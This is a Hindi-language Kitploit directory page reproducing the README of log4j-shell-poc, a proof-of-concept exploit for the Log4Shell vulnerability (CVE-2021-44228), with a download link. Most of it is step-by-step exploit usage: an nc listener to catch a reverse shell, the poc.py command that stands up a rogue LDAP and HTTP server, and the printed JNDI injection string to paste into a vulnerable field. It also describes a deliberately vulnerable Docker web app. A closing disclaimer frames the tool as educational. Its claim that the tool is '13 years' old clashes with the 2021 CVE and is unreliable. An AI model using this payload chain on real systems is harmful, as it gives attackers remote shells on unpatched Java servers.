Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
log4j-shell-poc — CVE-2021-44228 भेद्यता के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट। | Kitploit
उपकरण/GitHubGitHub/ocastel/log4j-shell-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubocastel/log4j-shell-poc

log4j-shell-poc

CVE-2021-44228 भेद्यता के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट।

रिपॉजिटरी देखें
13 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

log4j-shell-poc

हाल ही में पाए गए CVE-2021-44228 कमजोरी के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट।

हाल ही में log4j में एक नई कमजोरी सामने आई, जो एक Java लॉगिंग लाइब्रेरी है जो elasticsearch, minecraft और कई अन्य जगहों पर व्यापक रूप से उपयोग की जाती है।

इस रिपॉजिटरी में हमने एक उदाहरण असुरक्षित अनुप्रयोग और उसका प्रूफ-ऑफ-कॉन्सेप्ट (POC) एक्सप्लॉइट बनाया है।

शोषण प्रक्रिया दिखाने वाला एक वीडियो

असुरक्षित वेब ऐप:

https://user-images.githubusercontent.com/87979263/146113359-20663eaa-555d-4d60-828d-a7f769ebd266.mp4


Ghidra (पुरानी स्क्रिप्ट):

https://user-images.githubusercontent.com/87979263/145728478-b4686da9-17d0-4511-be74-c6e6fff97740.mp4


Minecraft PoC (पुरानी स्क्रिप्ट):

https://user-images.githubusercontent.com/87979263/145681727-2bfd9884-a3e6-45dd-92e2-a624f29a8863.mp4

प्रूफ-ऑफ-कॉन्सेप्ट (POC)

PoC के रूप में, हमने एक पायथन फ़ाइल बनाई है जो इस प्रक्रिया को स्वचालित करती है।

आवश्यकताएँ:

root@kitploit:~
pip install -r requirements.txt

उपयोग:

  • रिवर्स शेल कनेक्शन स्वीकार करने के लिए एक netcat लिसनर प्रारंभ करें।
root@kitploit:~
nc -lvnp 9001
  • एक्सप्लॉइट लॉन्च करें।
    नोट: इसे काम करने के लिए, निकाला गया Java आर्काइव jdk1.8.0_20 नाम का होना चाहिए, और उसी निर्देशिका में होना चाहिए।
root@kitploit:~
$ python3 poc.py --userip localhost --webport 8000 --lport 9001

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up fake LDAP server

[+] Send me: ${jndi:ldap://localhost:1389/a}

Listening on 0.0.0.0:1389

यह स्क्रिप्ट आपके लिए HTTP सर्वर और LDAP सर्वर सेटअप करेगी, और यह वह पेलोड भी बनाएगी जिसे आप असुरक्षित पैरामीटर में पेस्ट कर सकते हैं। इसके बाद, यदि सब कुछ ठीक रहा, तो आपको lport पर शेल मिल जाना चाहिए।


हमारा असुरक्षित अनुप्रयोग

हमने असुरक्षित वेबऐप के साथ एक Dockerfile जोड़ा है। आप इसे नीचे दिए गए चरणों का पालन करके उपयोग कर सकते हैं:

root@kitploit:~
1: docker build -t log4j-shell-poc .
2: docker run --network host log4j-shell-poc

एक बार यह चल रहा हो, तो आप इसे localhost:8080 पर एक्सेस कर सकते हैं।

यदि आप परियोजना को आगे विकसित करना चाहते हैं, तो आप Intellij IDE का उपयोग कर सकते हैं, जिसका उपयोग हमने परियोजना को विकसित करने के लिए किया था। हमने एक .idea फ़ोल्डर भी शामिल किया है जहाँ कॉन्फ़िगरेशन फ़ाइलें हैं जो काम को थोड़ा आसान बनाती हैं। आप शायद अन्य IDE का भी उपयोग कर सकते हैं।


Java संस्करण प्राप्त करना।

एक्सप्लॉइट बनाते समय हमें यह निश्चित नहीं था कि Java के कौन से संस्करण काम करते हैं और कौन से नहीं, इसलिए हमने Java 8 के सबसे शुरुआती संस्करणों में से एक: java-8u20 के साथ काम करना चुना।

Oracle शुक्र है कि पिछले सभी Java संस्करणों का एक आर्काइव प्रदान करता है:
https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html।
नीचे 8u20 तक स्क्रॉल करें और अपने ऑपरेटिंग सिस्टम और हार्डवेयर के लिए उपयुक्त फ़ाइलें डाउनलोड करें। Screenshot from 2021-12-11 00-09-25

नोट: पैकेज डाउनलोड करने के लिए आपको एक खाता बनाना आवश्यक है।

एक बार जब आप आर्काइव डाउनलोड और निकाल लेते हैं, तो आप jdk1.8.0_20/bin में java और कुछ संबंधित बाइनरी पा सकते हैं।
नोट: कृपया सुनिश्चित करें कि इसे काम करने के लिए jdk फ़ोल्डर को इसी नाम के साथ इस रिपॉजिटरी में निकालें।

root@kitploit:~
❯ tar -xf jdk-8u20-linux-x64.tar.gz

❯ ./jdk1.8.0_20/bin/java -version
java version "1.8.0_20"
Java(TM) SE Runtime Environment (build 1.8.0_20-b26)
Java HotSpot(TM) 64-Bit Server VM (build 25.20-b23, mixed mode)

अस्वीकरण

यह रिपॉजिटरी CVE-2021-44228 के लिए एक-क्लिक एक्सप्लॉइट होने के इरादे से नहीं है। इस परियोजना का उद्देश्य लोगों को इस शानदार कमजोरी के बारे में सीखने में मदद करना है, और शायद अपने स्वयं के अनुप्रयोगों का परीक्षण करना है (हालाँकि इस उद्देश्य के लिए बेहतर अनुप्रयोग हैं, जैसे: https://log4shell.tools/)।

हमारी टीम दुर्भावनापूर्ण गतिविधि के लिए इस एक्सप्लॉइट के किसी भी उपयोग में सहायता या समर्थन नहीं करेगी, इसलिए यदि आप सहायता माँगते हैं तो आपको हमें यह प्रमाण देना पड़ सकता है कि आप या तो लक्षित सेवा के मालिक हैं या आपके पास उस पर पेनटेस्ट करने की अनुमति है।

टूल डाउनलोड करें